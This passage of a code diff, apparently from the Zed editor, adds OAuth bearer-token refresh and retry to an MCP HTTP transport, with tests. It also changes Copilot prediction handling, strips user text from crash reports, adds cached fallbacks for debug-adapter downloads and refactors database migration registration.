+ Box::pin(async { json_response(401, r#"{"error": "invalid_grant"}"#) })
+ });
+
+ let provider = McpOAuthTokenProvider::new(session, http_client, None);
+
+ let refreshed = provider.try_refresh().await.unwrap();
+ assert!(!refreshed);
+ // The old token should still be in place.
+ assert_eq!(provider.access_token().as_deref(), Some("old-access"));
+ });
+ }
+}
@@ -8,8 +8,30 @@ use parking_lot::Mutex as SyncMutex;
use smol::channel;
use std::{pin::Pin, sync::Arc};
+use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate};
use crate::transport::Transport;
+/// Typed errors returned by the HTTP transport that callers can downcast from
+/// `anyhow::Error` to handle specific failure modes.
+#[derive(Debug)]
+pub enum TransportError {
+ /// The server returned 401 and token refresh either wasn't possible or
+ /// failed. The caller should initiate the OAuth authorization flow.
+ AuthRequired { www_authenticate: WwwAuthenticate },
+}
+
+impl std::fmt::Display for TransportError {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ match self {
+ TransportError::AuthRequired { .. } => {
+ write!(f, "OAuth authorization required")
+ }
+ }
+ }
+}
+
+impl std::error::Error for TransportError {}
+
// Constants from MCP spec
const HEADER_SESSION_ID: &str = "Mcp-Session-Id";
const EVENT_STREAM_MIME_TYPE: &str = "text/event-stream";
@@ -25,8 +47,11 @@ pub struct HttpTransport {
response_rx: channel::Receiver<String>,
error_tx: channel::Sender<String>,
error_rx: channel::Receiver<String>,
- // Authentication headers to include in requests
+ /// Static headers to include in every request (e.g. from server config).
headers: HashMap<String, String>,
+ /// When set, the transport attaches `Authorization: Bearer` headers and
+ /// handles 401 responses with token refresh + retry.
+ token_provider: Option<Arc<dyn OAuthTokenProvider>>,
}
impl HttpTransport {
@@ -35,6 +60,16 @@ impl HttpTransport {
endpoint: String,
headers: HashMap<String, String>,
executor: BackgroundExecutor,
+ ) -> Self {
+ Self::new_with_token_provider(http_client, endpoint, headers, executor, None)
+ }
+
+ pub fn new_with_token_provider(
+ http_client: Arc<dyn HttpClient>,
+ endpoint: String,
+ headers: HashMap<String, String>,
+ executor: BackgroundExecutor,
+ token_provider: Option<Arc<dyn OAuthTokenProvider>>,
) -> Self {
let (response_tx, response_rx) = channel::unbounded();
let (error_tx, error_rx) = channel::unbounded();
@@ -49,14 +84,14 @@ impl HttpTransport {
error_tx,
error_rx,
headers,
+ token_provider,
}
}
- /// Send a message and handle the response based on content type
- async fn send_message(&self, message: String) -> Result<()> {
- let is_notification =
- !message.contains("\"id\":") || message.contains("notifications/initialized");
-
+ /// Build a POST request for the given message body, attaching all standard
+ /// headers (content-type, accept, session ID, static headers, and bearer
+ /// token if available).
+ fn build_request(&self, message: &[u8]) -> Result<http_client::Request<AsyncBody>> {
let mut request_builder = Request::builder()
.method(Method::POST)
.uri(&self.endpoint)
@@ -70,15 +105,71 @@ impl HttpTransport {
request_builder = request_builder.header(key.as_str(), value.as_str());
}
- // Add session ID if we have one (except for initialize)
+ // Attach bearer token when a token provider is present.
+ if let Some(token) = self.token_provider.as_ref().and_then(|p| p.access_token()) {
+ request_builder = request_builder.header("Authorization", format!("Bearer {}", token));
+ }
+
+ // Add session ID if we have one (except for initialize).
if let Some(ref session_id) = *self.session_id.lock() {
request_builder = request_builder.header(HEADER_SESSION_ID, session_id.as_str());
}
- let request = request_builder.body(AsyncBody::from(message.into_bytes()))?;
+ Ok(request_builder.body(AsyncBody::from(message.to_vec()))?)
+ }
+
+ /// Send a message and handle the response based on content type.
+ async fn send_message(&self, message: String) -> Result<()> {
+ let is_notification =
+ !message.contains("\"id\":") || message.contains("notifications/initialized");
+
+ // If we currently have no access token, try refreshing before sending
+ // the request so restored but expired sessions do not need an initial
+ // 401 round-trip before they can recover.
+ if let Some(ref provider) = self.token_provider {
+ if provider.access_token().is_none() {
+ provider.try_refresh().await.unwrap_or(false);
+ }
+ }
+
+ let request = self.build_request(message.as_bytes())?;
let mut response = self.http_client.send(request).await?;
- // Handle different response types based on status and content-type
+ // On 401, try refreshing the token and retry once.
+ if response.status().as_u16() == 401 {
+ let www_auth_header = response
+ .headers()
+ .get("www-authenticate")
+ .and_then(|v| v.to_str().ok())
+ .unwrap_or("Bearer");
+
+ let www_authenticate =
+ oauth::parse_www_authenticate(www_auth_header).unwrap_or(WwwAuthenticate {
+ resource_metadata: None,
+ scope: None,
+ error: None,
+ error_description: None,
+ });
+
+ if let Some(ref provider) = self.token_provider {
+ if provider.try_refresh().await.unwrap_or(false) {
+ // Retry with the refreshed token.
+ let retry_request = self.build_request(message.as_bytes())?;
+ response = self.http_client.send(retry_request).await?;
+
+ // If still 401 after refresh, give up.
+ if response.status().as_u16() == 401 {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ } else {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ } else {
+ return Err(TransportError::AuthRequired { www_authenticate }.into());
+ }
+ }
+
+ // Handle different response types based on status and content-type.
match response.status() {
status if status.is_success() => {
// Check content type
@@ -233,6 +324,7 @@ impl Drop for HttpTransport {
let endpoint = self.endpoint.clone();
let session_id = self.session_id.lock().clone();
let headers = self.headers.clone();
+ let access_token = self.token_provider.as_ref().and_then(|p| p.access_token());
if let Some(session_id) = session_id {
self.executor
@@ -242,11 +334,17 @@ impl Drop for HttpTransport {
.uri(&endpoint)
.header(HEADER_SESSION_ID, &session_id);
- // Add authentication headers if present
+ // Add static authentication headers.
for (key, value) in headers {
request_builder = request_builder.header(key.as_str(), value.as_str());
}
+ // Attach bearer token if available.
+ if let Some(token) = access_token {
+ request_builder =
+ request_builder.header("Authorization", format!("Bearer {}", token));
+ }
+
let request = request_builder.body(AsyncBody::empty());
if let Ok(request) = request {
@@ -257,3 +355,402 @@ impl Drop for HttpTransport {
}
}
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use async_trait::async_trait;
+ use gpui::TestAppContext;
+ use parking_lot::Mutex as SyncMutex;
+ use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
+
+ /// A mock token provider that returns a configurable token and tracks
+ /// refresh attempts.
+ struct FakeTokenProvider {
+ token: SyncMutex<Option<String>>,
+ refreshed_token: SyncMutex<Option<String>>,
+ refresh_succeeds: AtomicBool,
+ refresh_count: AtomicUsize,
+ }
+
+ impl FakeTokenProvider {
+ fn new(token: Option<&str>, refresh_succeeds: bool) -> Arc<Self> {
+ Self::with_refreshed_token(token, None, refresh_succeeds)
+ }
+
+ fn with_refreshed_token(
+ token: Option<&str>,
+ refreshed_token: Option<&str>,
+ refresh_succeeds: bool,
+ ) -> Arc<Self> {
+ Arc::new(Self {
+ token: SyncMutex::new(token.map(String::from)),
+ refreshed_token: SyncMutex::new(refreshed_token.map(String::from)),
+ refresh_succeeds: AtomicBool::new(refresh_succeeds),
+ refresh_count: AtomicUsize::new(0),
+ })
+ }
+
+ fn set_token(&self, token: &str) {
+ *self.token.lock() = Some(token.to_string());
+ }
+
+ fn refresh_count(&self) -> usize {
+ self.refresh_count.load(Ordering::SeqCst)
+ }
+ }
+
+ #[async_trait]
+ impl OAuthTokenProvider for FakeTokenProvider {
+ fn access_token(&self) -> Option<String> {
+ self.token.lock().clone()
+ }
+
+ async fn try_refresh(&self) -> Result<bool> {
+ self.refresh_count.fetch_add(1, Ordering::SeqCst);
+
+ let refresh_succeeds = self.refresh_succeeds.load(Ordering::SeqCst);
+ if refresh_succeeds {
+ if let Some(token) = self.refreshed_token.lock().clone() {
+ *self.token.lock() = Some(token);
+ }
+ }
+
+ Ok(refresh_succeeds)
+ }
+ }
+
+ fn make_fake_http_client(
+ handler: impl Fn(
+ http_client::Request<AsyncBody>,
+ ) -> std::pin::Pin<
+ Box<dyn std::future::Future<Output = anyhow::Result<Response<AsyncBody>>> + Send>,
+ > + Send
+ + Sync
+ + 'static,
+ ) -> Arc<dyn HttpClient> {
+ http_client::FakeHttpClient::create(handler) as Arc<dyn HttpClient>
+ }
+
+ fn json_response(status: u16, body: &str) -> anyhow::Result<Response<AsyncBody>> {
+ Ok(Response::builder()
+ .status(status)
+ .header("Content-Type", "application/json")
+ .body(AsyncBody::from(body.as_bytes().to_vec()))
+ .unwrap())
+ }
+
+ #[gpui::test]
+ async fn test_bearer_token_attached_to_requests(cx: &mut TestAppContext) {
+ // Capture the Authorization header from the request.
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let provider = FakeTokenProvider::new(Some("test-access-token"), false);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed");
+
+ assert_eq!(
+ captured_auth.lock().as_deref(),
+ Some("Bearer test-access-token"),
+ );
+ }
+
+ #[gpui::test]
+ async fn test_no_bearer_token_without_provider(cx: &mut TestAppContext) {
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let transport = HttpTransport::new(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed");
+
+ assert!(captured_auth.lock().is_none());
+ }
+
+ #[gpui::test]
+ async fn test_missing_token_triggers_refresh_before_first_request(cx: &mut TestAppContext) {
+ let captured_auth = Arc::new(SyncMutex::new(None::<String>));
+ let captured_auth_clone = captured_auth.clone();
+
+ let client = make_fake_http_client(move |req| {
+ let auth = req
+ .headers()
+ .get("Authorization")
+ .map(|v| v.to_str().unwrap().to_string());
+ *captured_auth_clone.lock() = auth;
+ Box::pin(async { json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#) })
+ });
+
+ let provider = FakeTokenProvider::with_refreshed_token(None, Some("refreshed-token"), true);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after proactive refresh");
+
+ assert_eq!(provider.refresh_count(), 1);
+ assert_eq!(
+ captured_auth.lock().as_deref(),
+ Some("Bearer refreshed-token"),
+ );
+ }
+
+ #[gpui::test]
+ async fn test_invalid_token_still_triggers_refresh_and_retry(cx: &mut TestAppContext) {
+ let request_count = Arc::new(AtomicUsize::new(0));
+ let request_count_clone = request_count.clone();
+
+ let client = make_fake_http_client(move |_req| {
+ let count = request_count_clone.fetch_add(1, Ordering::SeqCst);
+ Box::pin(async move {
+ if count == 0 {
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer error="invalid_token", resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ } else {
+ json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#)
+ }
+ })
+ });
+
+ let provider = FakeTokenProvider::with_refreshed_token(
+ Some("old-token"),
+ Some("refreshed-token"),
+ true,
+ );
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after refresh");
+
+ assert_eq!(provider.refresh_count(), 1);
+ assert_eq!(request_count.load(Ordering::SeqCst), 2);
+ }
+
+ #[gpui::test]
+ async fn test_401_triggers_refresh_and_retry(cx: &mut TestAppContext) {
+ let request_count = Arc::new(AtomicUsize::new(0));
+ let request_count_clone = request_count.clone();
+
+ let client = make_fake_http_client(move |_req| {
+ let count = request_count_clone.fetch_add(1, Ordering::SeqCst);
+ Box::pin(async move {
+ if count == 0 {
+ // First request: 401.
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ } else {
+ // Retry after refresh: 200.
+ json_response(200, r#"{"jsonrpc":"2.0","id":1,"result":{}}"#)
+ }
+ })
+ });
+
+ let provider = FakeTokenProvider::new(Some("old-token"), true);
+ // Simulate the refresh updating the token.
+ let provider_ref = provider.clone();
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ // Set the new token that will be used on retry.
+ provider_ref.set_token("refreshed-token");
+
+ transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .expect("send should succeed after refresh");
+
+ assert_eq!(provider_ref.refresh_count(), 1);
+ assert_eq!(request_count.load(Ordering::SeqCst), 2);
+ }
+
+ #[gpui::test]
+ async fn test_401_returns_auth_required_when_refresh_fails(cx: &mut TestAppContext) {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header(
+ "WWW-Authenticate",
+ r#"Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", scope="read write""#,
+ )
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ // Refresh returns false — no new token available.
+ let provider = FakeTokenProvider::new(Some("stale-token"), false);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ let transport_err = err
+ .downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ match transport_err {
+ TransportError::AuthRequired { www_authenticate } => {
+ assert_eq!(
+ www_authenticate
+ .resource_metadata
+ .as_ref()
+ .map(|u| u.as_str()),
+ Some("https://mcp.example.com/.well-known/oauth-protected-resource"),
+ );
+ assert_eq!(
+ www_authenticate.scope,
+ Some(vec!["read".to_string(), "write".to_string()]),
+ );
+ }
+ }
+ assert_eq!(provider.refresh_count(), 1);
+ }
+
+ #[gpui::test]
+ async fn test_401_returns_auth_required_without_provider(cx: &mut TestAppContext) {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header("WWW-Authenticate", "Bearer")
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ // No token provider at all.
+ let transport = HttpTransport::new(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ let transport_err = err
+ .downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ match transport_err {
+ TransportError::AuthRequired { www_authenticate } => {
+ assert!(www_authenticate.resource_metadata.is_none());
+ assert!(www_authenticate.scope.is_none());
+ }
+ }
+ }
+
+ #[gpui::test]
+ async fn test_401_after_successful_refresh_still_returns_auth_required(
+ cx: &mut TestAppContext,
+ ) {
+ // Both requests return 401 — the server rejects the refreshed token too.
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header("WWW-Authenticate", "Bearer")
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ let provider = FakeTokenProvider::new(Some("token"), true);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ err.downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ // Refresh was attempted exactly once.
+ assert_eq!(provider.refresh_count(), 1);
+ }
+}
@@ -949,7 +949,7 @@ impl Copilot {
&& let Some(registered_buffer) = server.registered_buffers.get_mut(&buffer.entity_id())
{
match event {
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
drop(registered_buffer.report_changes(&buffer, cx));
}
language::BufferEvent::Saved => {
@@ -1779,6 +1779,7 @@ mod tests {
fn disk_state(&self) -> language::DiskState {
language::DiskState::Present {
mtime: ::fs::MTime::from_seconds_and_nanos(100, 42),
+ size: 0,
}
}
@@ -129,7 +129,9 @@ impl EditPredictionDelegate for CopilotEditPredictionDelegate {
}
}
- fn discard(&mut self, _reason: EditPredictionDiscardReason, _: &mut Context<Self>) {}
+ fn discard(&mut self, _reason: EditPredictionDiscardReason, _: &mut Context<Self>) {
+ self.completion.take();
+ }
fn suggest(
&mut self,
@@ -410,8 +412,14 @@ mod tests {
assert_eq!(editor.display_text(cx), "one.c \ntwo\nthree\n");
assert_eq!(editor.text(cx), "one.c \ntwo\nthree\n");
- // When undoing the previously active suggestion is shown again.
+ // When undoing the previously active suggestion isn't shown again.
editor.undo(&Default::default(), window, cx);
+ assert!(!editor.has_active_edit_prediction());
+ assert_eq!(editor.display_text(cx), "one.c\ntwo\nthree\n");
+ assert_eq!(editor.text(cx), "one.c\ntwo\nthree\n");
+ });
+ executor.advance_clock(COPILOT_DEBOUNCE_TIMEOUT);
+ cx.editor(|editor, _, cx| {
assert!(editor.has_active_edit_prediction());
assert_eq!(editor.display_text(cx), "one.copilot2\ntwo\nthree\n");
assert_eq!(editor.text(cx), "one.c\ntwo\nthree\n");
@@ -387,10 +387,11 @@ impl CopilotCodeVerification {
.full_width()
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::Download)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, window, cx| {
reinstall_and_sign_in(copilot.clone(), window, cx)
}),
@@ -570,10 +571,11 @@ impl ConfigurationView {
}
})
.style(ButtonStyle::Outlined)
- .icon(IconName::Github)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Github)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.when(edit_prediction, |this| this.tab_index(0isize))
.on_click(|_, window, cx| {
if let Some(app_state) = AppState::global(cx).upgrade()
@@ -600,10 +602,11 @@ impl ConfigurationView {
}
})
.style(ButtonStyle::Outlined)
- .icon(IconName::Download)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
if let Some(app_state) = AppState::global(cx).upgrade()
&& let Some(copilot) = GlobalCopilotAuth::try_get_or_init(app_state, cx)
@@ -350,8 +350,34 @@ impl minidumper::ServerHandler for CrashServer {
}
}
+/// Rust's string-slicing panics embed the user's string content in the message,
+/// e.g. "byte index 4 is out of bounds of `a`". Strip that suffix so we
+/// don't upload arbitrary user text in crash reports.
+fn strip_user_string_from_panic(message: &str) -> String {
+ const STRING_PANIC_PREFIXES: &[&str] = &[
+ // Older rustc (pre-1.95):
+ "byte index ",
+ "begin <= end (",
+ // Newer rustc (1.95+):
+ // https://github.com/rust-lang/rust/pull/145024
+ "start byte index ",
+ "end byte index ",
+ "begin > end (",
+ ];
+
+ if (message.ends_with('`') || message.ends_with("`[...]"))
+ && STRING_PANIC_PREFIXES
+ .iter()
+ .any(|prefix| message.starts_with(prefix))
+ && let Some(open) = message.find('`')
+ {
+ return format!("{} `<redacted>`", &message[..open]);
+ }
+ message.to_owned()
+}
+
pub fn panic_hook(info: &PanicHookInfo) {
- let message = info.payload_as_str().unwrap_or("Box<Any>").to_owned();
+ let message = strip_user_string_from_panic(info.payload_as_str().unwrap_or("Box<Any>"));
let span = info
.location()
@@ -8,6 +8,7 @@ use dap::{
},
};
use fs::Fs;
+use futures::StreamExt;
use gpui::{AsyncApp, SharedString};
use language::LanguageName;
use log::warn;
@@ -71,27 +72,59 @@ impl GoDebugAdapter {
return Ok(path);
}
- let asset = Self::fetch_latest_adapter_version(delegate).await?;
- let ty = if consts::OS == "windows" {
- DownloadedFileType::Zip
- } else {
- DownloadedFileType::GzipTar
- };
- download_adapter_from_github(
- "delve-shim-dap".into(),
- asset.clone(),
- ty,
- delegate.as_ref(),
- )
- .await?;
+ let adapter_dir = paths::debug_adapters_dir().join("delve-shim-dap");
+
+ match Self::fetch_latest_adapter_version(delegate).await {
+ Ok(asset) => {
+ let ty = if consts::OS == "windows" {
+ DownloadedFileType::Zip
+ } else {
+ DownloadedFileType::GzipTar
+ };
+ download_adapter_from_github(
+ "delve-shim-dap".into(),
+ asset.clone(),
+ ty,
+ delegate.as_ref(),
+ )
+ .await?;
+
+ let path = adapter_dir
+ .join(format!("delve-shim-dap_{}", asset.tag_name))
+ .join(format!("delve-shim-dap{}", consts::EXE_SUFFIX));
+ self.shim_path.set(path.clone()).ok();
- let path = paths::debug_adapters_dir()
- .join("delve-shim-dap")
- .join(format!("delve-shim-dap_{}", asset.tag_name))
- .join(format!("delve-shim-dap{}", std::env::consts::EXE_SUFFIX));
- self.shim_path.set(path.clone()).ok();
+ Ok(path)
+ }
+ Err(error) => {
+ let binary_name = format!("delve-shim-dap{}", consts::EXE_SUFFIX);
+ let mut cached = None;
+ if let Ok(mut entries) = delegate.fs().read_dir(&adapter_dir).await {
+ while let Some(entry) = entries.next().await {
+ if let Ok(version_dir) = entry {
+ let candidate = version_dir.join(&binary_name);
+ if delegate
+ .fs()
+ .metadata(&candidate)
+ .await
+ .is_ok_and(|m| m.is_some())
+ {
+ cached = Some(candidate);
+ break;
+ }
+ }
+ }
+ }
- Ok(path)
+ if let Some(path) = cached {
+ warn!("Failed to fetch latest delve-shim-dap, using cached version: {error:#}");
+ self.shim_path.set(path.clone()).ok();
+ Ok(path)
+ } else {
+ Err(error)
+ }
+ }
+ }
}
}
@@ -224,16 +224,27 @@ impl PythonDebugAdapter {
) -> Result<Arc<Path>, String> {
self.debugpy_whl_base_path
.get_or_init(|| async move {
- self.maybe_fetch_new_wheel(toolchain, delegate)
- .await
- .map_err(|e| format!("{e}"))?;
- Ok(Arc::from(
- debug_adapters_dir()
- .join(Self::ADAPTER_NAME)
- .join("debugpy")
- .join("adapter")
- .as_ref(),
- ))
+ let adapter_path = debug_adapters_dir()
+ .join(Self::ADAPTER_NAME)
+ .join("debugpy")
+ .join("adapter");
+
+ if let Err(error) = self.maybe_fetch_new_wheel(toolchain, delegate).await {
+ if delegate
+ .fs()
+ .metadata(&adapter_path)
+ .await
+ .is_ok_and(|m| m.is_some())
+ {
+ log::warn!(
+ "Failed to fetch latest debugpy, using cached version: {error:#}"
+ );
+ } else {
+ return Err(format!("{error}"));
+ }
+ }
+
+ Ok(Arc::from(adapter_path.as_ref()))
})
.await
.clone()
@@ -19,6 +19,7 @@ test-support = []
anyhow.workspace = true
gpui.workspace = true
indoc.workspace = true
+inventory.workspace = true
log.workspace = true
paths.workspace = true
release_channel.workspace = true
@@ -26,6 +27,7 @@ smol.workspace = true
sqlez.workspace = true
sqlez_macros.workspace = true
util.workspace = true
+uuid.workspace = true
zed_env_vars.workspace = true
[dev-dependencies]
@@ -4,12 +4,15 @@ pub mod query;
// Re-export
pub use anyhow;
use anyhow::Context as _;
-use gpui::{App, AppContext};
+pub use gpui;
+use gpui::{App, AppContext, Global};
pub use indoc::indoc;
+pub use inventory;
pub use paths::database_dir;
pub use smol;
pub use sqlez;
pub use sqlez_macros;
+pub use uuid;
pub use release_channel::RELEASE_CHANNEL;
use sqlez::domain::Migrator;
@@ -22,6 +25,103 @@ use std::sync::{LazyLock, atomic::Ordering};
use util::{ResultExt, maybe};
use zed_env_vars::ZED_STATELESS;
+/// A migration registered via `static_connection!` and collected at link time.
+pub struct DomainMigration {
+ pub name: &'static str,
+ pub migrations: &'static [&'static str],
+ pub dependencies: &'static [&'static str],
+ pub should_allow_migration_change: fn(usize, &str, &str) -> bool,
+}
+
+inventory::collect!(DomainMigration);
+
+/// The shared database connection backing all domain-specific DB wrappers.
+/// Set as a GPUI global per-App. Falls back to a shared LazyLock if not set.
+pub struct AppDatabase(pub ThreadSafeConnection);
+
+impl Global for AppDatabase {}
+
+/// Migrator that runs all inventory-registered domain migrations.
+pub struct AppMigrator;
+
+impl Migrator for AppMigrator {
+ fn migrate(connection: &sqlez::connection::Connection) -> anyhow::Result<()> {
+ let registrations: Vec<&DomainMigration> = inventory::iter::<DomainMigration>().collect();
+        let sorted = topological_sort(&registrations);
+ for reg in &sorted {
+ let mut should_allow = reg.should_allow_migration_change;
+ connection.migrate(reg.name, reg.migrations, &mut should_allow)?;
+ }
+ Ok(())
+ }
+}
+
+impl AppDatabase {
+ /// Opens the production database and runs all inventory-registered
+ /// migrations in dependency order.
+ pub fn new() -> Self {
+ let db_dir = database_dir();
+ let scope = RELEASE_CHANNEL.dev_name();
+ let connection = smol::block_on(open_db::<AppMigrator>(db_dir, scope));
+ Self(connection)
+ }
+
+ /// Creates a new in-memory database with a unique name and runs all
+ /// inventory-registered migrations in dependency order.
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn test_new() -> Self {
+ let name = format!("test-db-{}", uuid::Uuid::new_v4());
+ let connection = smol::block_on(open_test_db::<AppMigrator>(&name));
+ Self(connection)
+ }
+
+ /// Returns the per-App connection if set, otherwise falls back to
+ /// the shared LazyLock.
+ pub fn global(cx: &App) -> &ThreadSafeConnection {
+ #[allow(unreachable_code)]
+ if let Some(db) = cx.try_global::<Self>() {
+ return &db.0;
+ } else {
+ #[cfg(any(feature = "test-support", test))]
+ return &TEST_APP_DATABASE.0;
+
+ panic!("database not initialized")
+ }
+ }
+}
+
+fn topological_sort<'a>(registrations: &[&'a DomainMigration]) -> Vec<&'a DomainMigration> {
+ let mut sorted: Vec<&DomainMigration> = Vec::new();
+ let mut visited: std::collections::HashSet<&str> = std::collections::HashSet::new();
+
+ fn visit<'a>(
+ name: &str,
+ registrations: &[&'a DomainMigration],
+ sorted: &mut Vec<&'a DomainMigration>,
+ visited: &mut std::collections::HashSet<&'a str>,
+ ) {
+ if visited.contains(name) {
+ return;
+ }
+ if let Some(reg) = registrations.iter().find(|r| r.name == name) {
+ for dep in reg.dependencies {
+ visit(dep, registrations, sorted, visited);
+ }
+ visited.insert(reg.name);
+ sorted.push(reg);
+ }
+ }
+
+ for reg in registrations {
+ visit(reg.name, registrations, &mut sorted, &mut visited);
+ }
+ sorted
+}
+
+/// Shared fallback `AppDatabase` used when no per-App global is set.
+#[cfg(any(test, feature = "test-support"))]
+static TEST_APP_DATABASE: LazyLock<AppDatabase> = LazyLock::new(AppDatabase::test_new);
+
const CONNECTION_INITIALIZE_QUERY: &str = sql!(
PRAGMA foreign_keys=TRUE;
);
@@ -110,12 +210,11 @@ pub async fn open_test_db<M: Migrator>(db_name: &str) -> ThreadSafeConnection {
/// Implements a basic DB wrapper for a given domain
///
/// Arguments:
-/// - static variable name for connection
/// - type of connection wrapper
/// - dependencies, whose migrations should be run prior to this domain's migrations
#[macro_export]
macro_rules! static_connection {
- ($id:ident, $t:ident, [ $($d:ty),* ] $(, $global:ident)?) => {
+ ($t:ident, [ $($d:ty),* ]) => {
impl ::std::ops::Deref for $t {
type Target = $crate::sqlez::thread_safe_connection::ThreadSafeConnection;
@@ -124,30 +223,33 @@ macro_rules! static_connection {
}
}
+ impl ::std::clone::Clone for $t {
+ fn clone(&self) -> Self {
+ $t(self.0.clone())
+ }
+ }
+
impl $t {
+ /// Returns an instance backed by the per-App database if set,
+ /// or the shared fallback connection otherwise.
+ pub fn global(cx: &$crate::gpui::App) -> Self {
+ $t($crate::AppDatabase::global(cx).clone())
+ }
+
#[cfg(any(test, feature = "test-support"))]
pub async fn open_test_db(name: &'static str) -> Self {
$t($crate::open_test_db::<$t>(name).await)
}
}
- #[cfg(any(test, feature = "test-support"))]
- pub static $id: std::sync::LazyLock<$t> = std::sync::LazyLock::new(|| {
- #[allow(unused_parens)]
- $t($crate::smol::block_on($crate::open_test_db::<($($d,)* $t)>(stringify!($id))))
- });
-
- #[cfg(not(any(test, feature = "test-support")))]
- pub static $id: std::sync::LazyLock<$t> = std::sync::LazyLock::new(|| {
- let db_dir = $crate::database_dir();
- let scope = if false $(|| stringify!($global) == "global")? {
- "global"
- } else {
- $crate::RELEASE_CHANNEL.dev_name()
- };
- #[allow(unused_parens)]
- $t($crate::smol::block_on($crate::open_db::<($($d,)* $t)>(db_dir, scope)))
